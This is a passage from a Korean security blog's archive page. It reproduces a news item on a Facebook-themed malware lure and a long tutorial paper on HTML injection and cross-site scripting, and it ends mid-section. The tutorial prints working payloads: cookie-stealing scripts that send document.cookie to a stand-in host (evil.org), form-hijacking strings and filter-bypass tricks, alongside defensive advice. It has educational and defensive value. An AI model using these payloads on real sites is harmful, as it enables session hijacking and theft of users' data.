'위험한_친구들'에 해당되는 글 50건

  1. 2011.09.05 Fake Facebook friend request email leads to malware by bitfox
  2. 2011.08.31 XSSed project by bitfox
  3. 2011.08.31 HTML Code Injection and Cross-site scripting by bitfox
  4. 2011.08.29 XSS-Harvest / xss-harvest.pl by bitfox
  5. 2011.08.20 How to crack a WEP key and decrypt live traffic by bitfox
  6. 2011.08.17 Userland Hooking in Windows by bitfox
  7. 2011.08.16 Timthumb Security Vulnerability – List of Themes by bitfox
  8. 2011.08.16 [spanish] Asaltando redes wifi by bitfox
  9. 2011.08.16 Adobe RoboHelp 9 DOM Cross Site Scripting by bitfox
  10. 2011.08.10 Tutorial: How to Crack WPA/WPA2 by bitfox

Fake Facebook friend request email leads to malware

위험한_친구들/십자군_XSS 2011. 9. 5. 23:22
최근 나의 구글 멜로 Face북에 친구 요청 메일이 많아 졌다. (참고로 전 페북은 활동이 저조합니다.--;)
이런 메일을 통한 악성 malware를 배포하는 공격이 빈번하다고 한다.



이 메일을 클릭하면 숨겨진 iframe으로 악성 파일을 받아 당신의 컴퓨터를 좀비 피씨로 만들 수 있다.
내용은 아래와 같다.


Fake Facebook friend request, now with hidden iFrame
A slight variation of last week's Facebook friend request spam email campaign has been spotted targeting the social network's users, and this one employs a two-pronged method of attack.

The email mimics Facebook's legitimate friend request message, but there are a few details that might tip off the recipient off to the real nature of the email: the picture of the person who wants to be friends with the user is not included, and the recipient's email address is omitted from the text in the bottom of the email.

But, let's say that the recipient has been fooled, and he clicks on the "Confirm friend request" button. As in the previous scam, he is taken to a fake Facebook page saying that his version of Macromedia Flash Player is too old to continue, and offering a link for downloading the latest version of the player.

But that's not all - the page now also includes a hidden iFrame that loads data from a remote server hosting the Blackhole Exploit Kit, say M86 Security researchers.


The exploit kit tries to take advantage of Java vulnerabilities in the recipient's system and if it succeeds, it downloads what seems to be a variant of the Zeus banking Trojan.




[출처]http://www.net-security.org/malware_news.php?id=1820
저작자표시 비영리 변경금지

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Cookiejacking  (0) 2011.09.15
홍커쪽 XSS 체크리스트  (0) 2011.09.14
XSSed project  (0) 2011.08.31
HTML Code Injection and Cross-site scripting  (0) 2011.08.31
XSS-Harvest / xss-harvest.pl  (0) 2011.08.29
Posted by bitfox
l

XSSed project

위험한_친구들/십자군_XSS 2011. 8. 31. 10:51
XSS에 대한 취약점에 대해 상세히 설명하고 있으며 프로젝트로 XSS에 취약한 사이트를 공개하는
정보 사이트

The XSSed project was created in early February 2007 by KF and DP. It  provides information on all things related to cross-site scripting vulnerabilities and is the largest online archive of XSS vulnerable websites.

We started this project with the scope of increasing security and privacy on the web. Professional and amateur webmasters and web developers are notified about any cross-site scripting vulnerability affecting their online properties. The importance of securing their web applications is emphasized through the informational and educational content which we provide.

What we do is to simply validate all the submitted XSS vulnerable websites and then publish them on the archive. We actively assist all website owners to remediate the cross-site scripting issues by bringing them up to their attention on a timely manner. You will be helped by us for any problems you may face when trying to correct the XSS flaws



http://xssed.org/archive
저작자표시 비영리 변경금지

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

홍커쪽 XSS 체크리스트  (0) 2011.09.14
Fake Facebook friend request email leads to malware  (0) 2011.09.05
HTML Code Injection and Cross-site scripting  (0) 2011.08.31
XSS-Harvest / xss-harvest.pl  (0) 2011.08.29
Adobe RoboHelp 9 DOM Cross Site Scripting  (0) 2011.08.16
Posted by bitfox
l

HTML Code Injection and Cross-site scripting

위험한_친구들/십자군_XSS 2011. 8. 31. 10:30
HTML Code Injection and Cross-site scripting
Understanding the cause and effect of CSS (XSS) Vulnerabilities

As web-based applications have become more sophisticated, the types of vulnerabilities are capable of exploiting has rapidly increased. A particular class of attacks commonly referred to as “code insertion” and often “Cross-Site Scripting” has become increasingly popular. Unfortunately, the number of applications vulnerable to these attacks is staggering, and the varieties of ways attackers are finding to successfully exploit them is on the increase. Analysis of many sites has indicated that not only are the majority of sites vulnerable, but they are vulnerable to many different methods and much of their content is affected.

Introduction

Web servers delivering dynamic content to Internet clients constitute an integral component of most organisations online service offerings. The ability to tune content and respond to an individual client request represents standard functionality for any successful site. Unfortunately, due to poorly developed application code and data processing systems, the majority of these successful sites are vulnerable to attacks that focus upon the way HTML content is generated and interpreted by client browsers. Attackers are often able to embed malicious HTML-based content within client web requests. With sufficient forethought and analysis, attackers can exploit these flaws by embedding scripting elements within the returned content without the knowledge of the sites visitor.
Although the potential dangers have been known for several years now, the recent successes and improved understanding of cross-site scripting attacks has increased the importance of correctly handing user input within dynamically generated web content. High profile sites have already been shown to be susceptible to cross-site scripting attack. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, many times more devastating.
This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and provide advice on securing applications against this type of attack.

Code Insertion

The success of this type of attack hinges upon the functionality of the client browser. In HTML, to distinguish displayable text from the interpreted markup language, some characters are treated specially. One of the most common special characters used to define elements within the markup language is the “<“ character, and is typically used to indicate the beginning of an HTML tag. These tags can either affect the formatting of the page or induce a program that the client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program).
As most web browsers have the ability to interpret scripts embedded within HTML content enabled by default, should an attacker successfully inject script content, it will likely be executed within context of the delivery (e.g. website, HTML help, etc.) by the end user. Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.
While this document largely focuses upon the threat presented through the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag – by inserting the appropriate HTML tag information, an attacker could trick visitors to the site into revealing sensitive information by modifying the behaviour of the existing form for instance. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. alteration of an organisations online annual accounts or presidents statement?).
It is important to understand the HTML tags that are most commonly used to carry out code insertion tags. The following table details the most important attributes of these tags. However, it is important to note that alternative “in-line” scripting elements may be used and interpreted by the current generation of web browsers, such as javascript:alert('executing script').

HTML Tag Description
<SCRIPT> Adds a script that is to be used in the document.
Attributes:
  • type = Specifies the language of the script. Its value must be a media type (e.g. text/javascript). This attribute is required by the HTML 4.0 specification and is a recommended replacement for the “language” attribute.
  • language = Identifies the language of the script, such as JavaScript or VBScript.
  • src = Specifies the URL of an outside file containing the script to be loaded and run with the document. (Netscape only)

Supported by: Netscape, IE 3+, HTML 4, Opera 3+

<OBJECT> Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object.
Attributes:
  • classid = Identifies the class identifier of the object.
  • codebase = Identifies the URL of the object’s codebase.
  • codetype = Specifies the media type of the code. Examples of code types include audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)
  • data = Specifies the URL of the data used for the object.
  • name = Specifies the name of the object to be referenced by scripts on the page.
  • standby = Specifies the message to display while the object loads.
  • type = Specifies the media type for the data.
  • usemap = Specifies the imagemap URL to use with the object.

Supported by: Netscape, IE, HTML 4

<APPLET> Used to place a Java applet on a document. It is depreciated in the HTML 4.0 specification in favour of <object> tag.
Attributes:
  • code = Specifies the class name of the code to be executed (required).
  • codebase = The URL from which the code is retrieved.
  • name = Names the applet for reference elsewhere on the page.

Supported by: Netscape, IE 3+, HTML 4

<EMBED> Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag was dropped by the HTML 4.0 specification in favour of the <object> tag.
Attributes:
  • hidden = Hides the media file or player from view when set to yes.
  • name = Specifies the name for the embedded object for later reference within a script.
  • pluginspage = Specifies the URL for information on installing the appropriate plug-in.
  • src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only)
  • code = Specifies the class name of the Java code to be executed. (IE only)
  • codebase = Specifies the base URL for the application. (IE only)
  • pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only)
  • type = Specifies the MIME type of the plug-in needed to run the file. (Netscape only)

Supported by: Netscape, IE 3+, Opera 3+

<FORM> Indicates the beginning and end of a form.
Attributes:
  • action = Specifies the URL of the application that will process the form.
  • enctype = Specifies how the values for the form controls are encoded when they are submitted to the server.
  • method = Specifies which HTTP method will be used to submit the form data.
  • target = Specifies a target window for the results of the form submission to be loaded ( _blank, _top, _parent, and _self).

Supported by: All

Malicious Code

An embedded code attack is heavily dependant upon the delivery mechanism. Thus the delivery method often dictates the audience the script will potentially affect.
It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Boards Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and later, the use of vector drawing languages permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt along time ago to rigorously control the content that be could submitted.
An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user submitted text from a standard POST form. This data was then added to the discussion page, without any further processing. Users often included text formatting tags to bold, italicise or colour their text – making a greater visual impact to their message. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider the implications of a user embedding the following two code snippets in their posting and what the implications would be to everyone viewing the message.

Hello World! <SCRIPT>malicious code</SCRIPT>

Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">

Unfortunately, attackers are finding ever more ingenious methods of encoding their embedded attacks, and consequently many more sites are vulnerable.
Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site sends a page back to the browser including the value of criteria, which consequently forces the execution of code from the evil attackers’ server. For example;

<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</A>

In the attack above, one source is inserting code into pages sent by another source.

It should be noted that this attack:
• disguises the link as a link to http://trusted.org,
• can be easily included in an HTML email message,
• does not supply the malicious code inline, but is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at anytime.
This class of vulnerability is popularly referred to as cross-site scripting (CSS or sometimes XSS).

Cross Site Scripting

A cross-site scripting vulnerability is caused by the failure of an web based application to validate user supplied input before returning it to the client system. “Cross-Site” refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim’s browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions which can result not only in cookie theft but account hijacking, changing of web application account settings, spreading of a webmail worm, etc.
Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.
The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.
The most popular CSS/XSS attack (and devastating) is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victims active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A detailed paper by iDefence goes into great detail explaining the process, but can be quickly summarised as follows:

  1. The attacker investigates an interesting site that normal users must authenticate to gain access to, and that tracks the authenticated user through the use of cookies or session ID’s
  2. The attacker finds a CSS vulnerable page on the site, for instance http://trusted.org/ account.asp.
  3. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims.
  4. Embedded within the special link are some coding elements specially designed to transmit a copy of the victims cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location .replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
  5. Unknown to the victim, the attacker has now received a copy of their cookie information.

The attacker now visits the web site and, by substituting his cookie information with that of the victims, is now perceived to be the victim by the server application.

Note that Cross-site scripting is commonly referred to as CSS and/or XSS.

Understanding Code Insertion

To date, security professions have discovered an ever increasing number of methods for potentially embedding code within poorly configured web applications. The following are some of the more common methods for doing so.

Inline Scripting

http://trusted.org/search.cgi?criteria=<script>code</script>

http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SCRIPT>

http://trusted.org/COM2.IMG%20src= "Javascript:alert(document.domain)"

Forced Error Responses

http://trusted.org/<script>code</script>
This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data.

http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>
If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the users browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of the request.

http://trusted.og/servlet/ org.apache.catalina.servlets.WebdavStatus/<script>code</script>
In the example above, when the Tomcat servlet is called with the training illegitimate request, an error page is served containing the offending text verbatim.

Non <SCRIPT> Events

" [event]='code'
In many cases it may be possible for an attacker to insert an exploit string, with the above syntax, into a HTML tag that should have been like:

<A HREF="exploit string">Go</A>
resulting in:
<A HREF="" [event]='code'">Go</A>

<b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>
As the client cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed.

JavaScript Entities

<img src="&{alert('CSS Vulnerable')};">
The special character “&” is sometimes interpreted as a new JavaScript code segment (entity).

Typical Payloads Formatting

<img src = "malicious.js">

<script>alert('hacked')</script>

<iframe = "malicious.js">

<script>document.write('<img src="http://evil.org/'+document.cookie+'") </script>

<a href="javascript:…">click-me</a>

Insertion Example

Dynamic URL Generation

Consider an application built for running on Microsoft’s Internet Information Server (IIS) web server platform. Dynamic content is delivered through IIS’s Active Server Pages (ASP).
Within the sample page, a dynamically built HTML tag for refining search parameters is constructed as follows:
<A HREF="http://trusted.org/search_main.asp? searchstring=SomeString">click-me</A>
and the ASP code required to generate a further query based upon this submitted information is:

<%
var BaserUrl = "http://trusted.org/search2.asp?
searchagain=";Response.Write("<a href=\"" + BaseUrl
+ Request.QueryString("SearchString") + "\">click-me</a>" )
%>

If the attacker was to replace the “SomeString” with their own code, as indicated next:
<a href="http://trusted.org/search_main.asp?
SearchString=%22+onmouoseover%3D%27ClientForm%
2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%
3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%
2Esubmit%3B%27">FooBar</a>

The likely result found in the dynamically generated ASP page will be:
<A HREF="http://trusted.org/search2.asp?
searchagain="" onmouoseover='ClientForm.
action="evil.org/get.asp?Data=" +
ClientForm.PersonalData;ClientForm.
submit;'">click-me</A>

In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attacker’s web site.

Bypassing Anti-CSS Filters

A key function of any application filtering process will be the removal of possible dangerous special characters. However, in many circumstances it may be difficult to filter a large range of these characters due to the applications unique requirements.
Corporate application developers must carefully evaluate how their code will perform with a variety of attack strings. In addition, they should fully understand the different methods that special characters can be encoded.
One of the most popular alternative character representations is HTML escaped encoding, sometimes mistakenly referred to as Unicode encoding. In this system, the HEX value of the ASCII character is prefixed with the “%” character.

Char ; / ? : @ = & < > #
Code %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
                       
Char { } | \ ^ ~ [ ] ` %
Code %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27

To better understand the processes behind bypassing Anti-CSS filtering mechanisms, a series of detailed examples are provided below.

Inserting Malicious Code
Simple Filtering of “<“ and “>“
Many applications that implement some kind of content filtering will typically filter out the “<“ and “>“ characters at the client-side. At first glance, this looks like an effective way of ensuring <script> type HTML tags are not possible. Unfortunately, not only client-side code easy to bypass, in many circumstances it can be bypassed using a mix of alternative character representations and other special characters.
Consider a routine that removes the “<“ and “>“ special characters:
document.write(cleanSearchString('<>'));

The attacker now uses an alternative coding for the filtered characters, “\x3c” and “\x3e” respectively, and initialises their code with “’) +” to escape out of the routine.
') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'

Commenting out malicious code
Consider an application that filters content on behalf of it clients by causing any scripting content to be “safely” commented out. For instance, <script>code</script> is filtered by the application to become:
<COMMENT>
<!--
code (NOT PARSED BY FILTER)
//-->
</COMMENT>

Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <comment> filter process. For example, the attacker can send the following code:
<script>
- -->
</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open( http://evil.org/fakeloginscreen.jsp); ">
</script>

After processing by the filter, the following code is embedded in the returned document:
<COMMENT>
<!--
- -->
</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/ fakeloginscreen.jsp);">
</COMMENT>

This particular attack was originally designed to bypass the security filtering processes of a large web-mail provider, and would have been embedded in HTML email content. Users viewing the email would automatically be prompted with a fake login screen, making for an easy method of harvesting user names and passwords.

Separate Window Handling
A popular method of handling potentially dangerous URL information is to force the URL to be opened in a new browser window. This then causes and malicious code to be executed in the context of a different DOM, using the ‘target=“_blank”’ addition to the HTML <HREF> tag.
Unfortunately, in many online email applications it is possible to bypass after analysing the “harmless” link supplied by the site.
Consider a site that parses the content,
<a href="javascript:…">click-me</a>
and, after processing, becomes:
<a href="javascript:…" target="_blank">click-me</a>
Causing the URL to be opened in a new window.

However, if the attacker constructs his HREF as follows,
<a href="javascript:..." foo="bar>click-me</a>
it will be interpreted as:
<a href="javascript:..." foo="bar target="_blank">click-me</a>
causing the code to be executed in the same page, under the same DOM.

Escaped JavaScript Entities
In cases where almost all special characters have are filtered from user supplied strings, attackers must encode the entire attack string.
Consider the following URL:
http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL %27%29%7d%3b&apropos=pos2

The “%26%7balert%28%27EVIL%27%29%7d%3b” resolves to &{alert('EVIL')}; causing in this instance an unexpected JavaScript alert window to popup, with the text “EVIL”.

Web Integration

As client web browsers have evolved, they have incorporated an increasingly diverse range of functions. At the same time, many common desktop applications have extended their functionality to replicate or incorporate the functionality of these same browsers. While the security flaw may be HTML injection, and more specifically CSS, the avenues available for a malicious user or attacker to initiate the attack are becoming ever broader. As is already evident, a popular “personalised” delivery mechanism has now become HTML email. Unfortunately, the delivery methods are becoming so diverse that no “single” security solution is available to prevent the attack. Consider the significance of the following delivery mechanisms.

The Flash! Attack

Flash! is a popular application for displaying animated visual information. Is has it’s own development language (ActiveScript) for creating sophisticated interactive menus, animated movies and games. The most popular web browsers often install the interpreter for these files by default and, due to the large number of sites that use the technology; many people will install the interpreter even if it wasn’t originally available with their web browser.
ActiveScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that would be successfully interpreted by the client web browser.

For instance, instead of:
getURL("http://www.technicalinfo.net")

It is possible to specify scripting code:
getURL("javascript:alert(document.cookie)")

Thus, it is possible to embed potentially dangerous scripting elements within a common file format. The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filter out HTML <script> type tags) and local security web browser settings.
For an attack to be successful, the dangerous Flash! file (typically terminating in a “.swf” extension) must be embedded within HTML data for viewing by remote clients. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for instance:

<EMBED
src="http://evil.org/badflash.swf" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?
P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"
width="100"
height="100">
</EMBED>

The Impact

The impact of malicious code insertion is often difficult to quantify and will change as new functionality or interactions are incorporated into both web servers and client browsers. Already, users may unintentionally execute scripts written by an attacker when they follow untrusted links in web pages, mail or instant messages, or any other application capable of displaying HTML content (e.g. Microsoft Help). For this reason, a series of examples best illustrate the diversity and impact of potential threats.

Consider the following examples:

  • An attacker often has access to the document retrieved since the malicious scripts are executed in a context that appears to have originated from the trusted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacker.
  • An attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server.
  • An attacker may be able to poison the sites persistent cookies, thus modifying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable within the cookie, and executed each time the site dynamically generates page content without the correct processing.
  • An attacker may be able to cause a “hidden window” to start on the client machine and us this to key-log all browser interaction of the victim. Should the victim later visit sites requiring authentication, the attacker could harvest this information.
  • CSS type attacks can occur over SSL-encrypted connections. The victim, accessing a trusted host over HTTPS, may still execute an attackers code unintentionally. If the attacker references document components on a remote host, the victims client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on a SSL-capable web server.
  • An attacker may construct the malicious code to reference internal resources. Thus, an attacker may gain unauthorised access to an Intranet web server. Only one page on one web server in a domain is required to compromise the entire domain.
  • An attacker may be able to bypass policies that prevent the victim browser from executing scripts. For example, Internet Explorer security “zones” may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed their code within the content of a trusted internal host.
  • An attacker may use a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. An attacker may be able to insert malicious code into their application data. A quick phone call to the corporate help-desk asking for advice on their account may cause the execution of the malicious code on the help-desk system.
  • Even if the victims’ web browser does not support scripting, an attacker may still be able to alter the content of the page – affecting its appearance, behaviour or normal operation.

To date the most popular application content to be targeted by attackers has been web pages that:

  • Return results based upon user input to search engines,
  • Process credit card information,
  • Store and user supplied content in databases and cookies for later retrieval.

Vulnerability Checking

Finding out if your application is vulnerable to a code insertion attack is often very simple. The key lies in the analysis of the dynamically generated client-side HTML content. The following process has been frequently used in the past.

  1. For each visible input field (these may be located in an HTML form, or represented in the URL as “variable=“), try the most obvious scripting formats:
    <script>alert('CSS Vulnerable')</script>
    <img csstest=javascript:alert('CSS Vulnerable')>
    &{alert('CSS Vulnerable')};
    In any case, should an alert message popup with the text “CSS Vulnerable”, the application component is vulnerable - specifically the input field just checked.
  2. If, either of the above scripting checks cause the HTML page to display incorrectly, the application component may still be vulnerable.
  3. For each visible variable, submit/substitute the following string:
    '';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quotes)
    On the resultant page, search for the string “<CSS_Check>“. If you discover “<CS_Check>“, it is quite probable that the application component is vulnerable. However, if the word CSS_Check is no longer enclosed in something similar to %ltCSS_Check%gt, then it may not be vulnerable. If input is displayed literally at ANY point in the document, it can be used to divert the flow of execution to an attacker-supplied payload.
  4. Having located the word CSS_Check, verify what (if any) other characters have be altered or filtered from the original string “'';!--"<CSS_Check>= &{()}”. Depending upon the filtered characters, the application component may still be vulnerable.
  5. Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If these characters exist, unfiltered, in responses to the test string of part 3 (above) – then there is a high probability that the application component is vulnerable.
  6. Moving on from the obvious fields, repeat the process for all the hidden fields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Security group and WebProxy by @stake. The proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application.
  7. In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components that require the HTTP POST command to submit data.

It is a simple process of turning a POST into a GET submission. If the application component fails to respond to the GET the same way as it did for the POST submission, it is probably not vulnerable to a URL based inline scripting attack.

Putting It All Together

To bring together many of the ideas and processes discussed earlier in this document, an example can be used to bring it all together. In this example, the anonymous site has a search engine that responds to client data submissions. Normally the site would look like this:

In our first test, we try submitting our first test string <script>alert('CSS Vulnerable')</script>, and receive the following response:

Notice the strange response in the “Your Search” box on the left. Zoomed in below.

Taking a closer look at the content source, we notice that our sample code appears 21 times in the document, in various formats.

It appears 10 times in a format similar to:
<SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/
anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')
</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>

9 times in a format similar to:
<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript
%3E&pager.offset=10">2</a>

And twice in the format similar to:
document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\
"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>');

Obviously there are three different server-side processing routines for processing client search data.

  1. In the first type (ad.uk.doubleclick.net format), it appears that the processing routine changes the case of characters and changes white space to the underscore (“_”).
  2. The second type (href=) converts special characters into their escape-encoded formats, and white space into the “+” character.
  3. The third type (document.writeln) places the complete string within a document.writeln JavaScript routine.

Several opportunities present themselves here. To make the site execute the JavaScript alert box for each type, we need to force the <script> tags outside of any other HTML tags. Thus, for each type, the following methods will work:

  1. ><script>alert('CSS Vulnerable')</script><b a=a
  2. a></a><script>alert('CSS Vulnerable')</script>
  3. \'><script>alert%28\'CSS Vulnerable\'%29</script><

The result is the following alert box (multiple times):

However, for this example, we shall focus on the last type (document.writeln). Since it is possible to inject code into the returned HTML page to the anonymous News site, to make the attack interesting, we shall “write” our own fake news article.

Due to the maximum length of any string we can send to the site, and the likely length of the fake news article, we shall create a JavaScript include file (.js) which we will load in to the page using: \'><script%20src%3dhttp://evil.org/faked.js></script>

In this example, the include file will use multiple document.write statements to create the fake news article. There are several key features to the include file, and include -

  • Use of HTML <DIV> tags to position the content on the page. Doing so allows the attacker to cover over existing content as they wish.
  • Using a table to keep all the article text together.
  • Rewriting of the URL source field at the top of the browser.
  • Rewriting of the browser status bar.

From the first few lines of the fake.js file:
var d = document;
d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2">
<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');
d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');

So far, everything we have tested on the site makes use of the existing form to submit the attacker’s code. This submission is done by a HTTP POST command, such as:
POST /Search HTTP/1.0
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
Content-Length: 135
Pragma: no-cache
dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js>
</script>newSearch=true&pro=IT&searchOption=articles

It is a simple process to convert the HTTP POST into a single URL. Unfortunately for the anonymous news site, the web application does not differentiate the methods of receiving data. Thus the following attack URL allows the attacker to place his own content “on” the site.
http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script
%20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT
&searchOption=articles

Defending Against the Attack

Solutions for Users

The only clear-cut solution for the user is to disable all scripting languages on their computer. Unfortunately, it is highly likely that much functionality of the sites regularly visited will be removed. Thus users should only pursue this option if they require the lowest possible level of request. Alternatively, users must be selective as to the sites they trust, and the sources of URL links. Again, the disabling of scripting languages will not prevent attackers influencing the appearance of content provided by trusted sites by embedding other HTML tags in the URL link.
With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker’s web site may still use scripted code to alter the representation of the links in the client browser.
Unfortunately many integrated applications increase the threat of scripting code being executed on the users system, particularly through the use of embedded objects such as Flash! .swf files. To prevent these types of attacks, users must either uninstall the interpreters or ensure protection systems are capable of stopping the execution of such content. It is envisaged that popular anti-virus and personal intrusion detection systems will eventually be capable of this.
Frankly, the onus for protecting users against code insertion and CSS type attacks relies upon the development of secure server-side applications. Ideally, the application should correctly handle and comment submitted data. Unfortunately, the likelihood that the application developer will miss some subtle character representation is quite high.

Solutions for Developers and Organisations

As no two applications are ever the same, application developers will need to tune their security countermeasures as defined by business requirements. The key to preventing applications being vulnerable to code injection and CSS type attacks is by ensuring that dynamically generated page content does not contain undesired HTML tags.

The most likely sources of malicious data are likely to be:

  • Query strings
  • URL’s and pieces of UL’s
  • Posted data
  • Cookies
  • Persistent data supplied by users, and retrieved at a later date (such as from databases)

The following methods or design considerations can be implemented by developers to better secure their application against HTTP based attacks, not just CSS.

Limit Server Responses

In many cases it may be possible to limit the amount of “personalised” data that will be returned to client browsers through the use of generic responses.
For example, consider a site that that displays the greeting “Hello, Gunter!” in response to http://trusted.org/greeting.jsp?name=Gunter. It would be a preferable security option to sacrifice this dynamic response with a hard-coded response such as “Hello, User!”

Enforce Response Lengths

For the majority of applications, the developer should be able to limit the maximum length of any user-supplied strings. Although initially enforced at the client-side, all strings should also be checked at the server-side. Where possible, enforce the limitation of the maximum necessary string length by truncating any longer responses.

HTTP Referer

As part of the HTTP standard, provision is made for a field header called “referer”. When a client browser follows a link or submits form data, the referer field should contain the URL of the page that the link or data came from. If possible, the web application should check the referer field and reject data if it didn’t come from the correct host or link.

HTTP Referer
Usually appearing in the HEAD of any HTTP requests:
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
Advantages:
  • An attack would fail irrespective of any character or HTML tag filtering policies.
Disadvantages:
  • There is a risk of blocking legitimate links and form submission. As the referer field is optional, rejecting a blank referer field would prevent the application supporting certain client browsers.
  • In some cases, the referer field may be blank or missing if the user followed a link that may be referenced locally (e.g. email messages, cached pages and favourites).
  • Some browsers deliberately clear the referer field when navigating from a secure (HTTPS) page to an unsecure (HTTP) page.

Embedded Files and Objects

As witnessed by the Flash! Attack, attackers may be capable of embedding scripting components that can be interpreted by the client web browser and used to conduct a CSS attack.
For inclusion within a HTML based document, embedded files and objects are referred to using the HTML <EMBED> and <OBJECT> tags. Several options are available for decreasing the threat of embedded CSS attacks:

  • The safest option is to treat <EMBED> and <OBJECT> tags the same as <SCRIPT> tags, and disallow any content to be submitted to the application that contains such data strings.
  • Depending upon the format of the embedded object, it may be possible parse filter content based upon content within the object. For instance, with Flash! files, it would be possible to remove all instances where the getURL() field contains a reference to a site other than the current application host. Alternatively, it may be possible to specify the target window as “_blank” and thus stopping any potential scripting code from being executed under the hosting domains privileges.

HTTP POST not GET

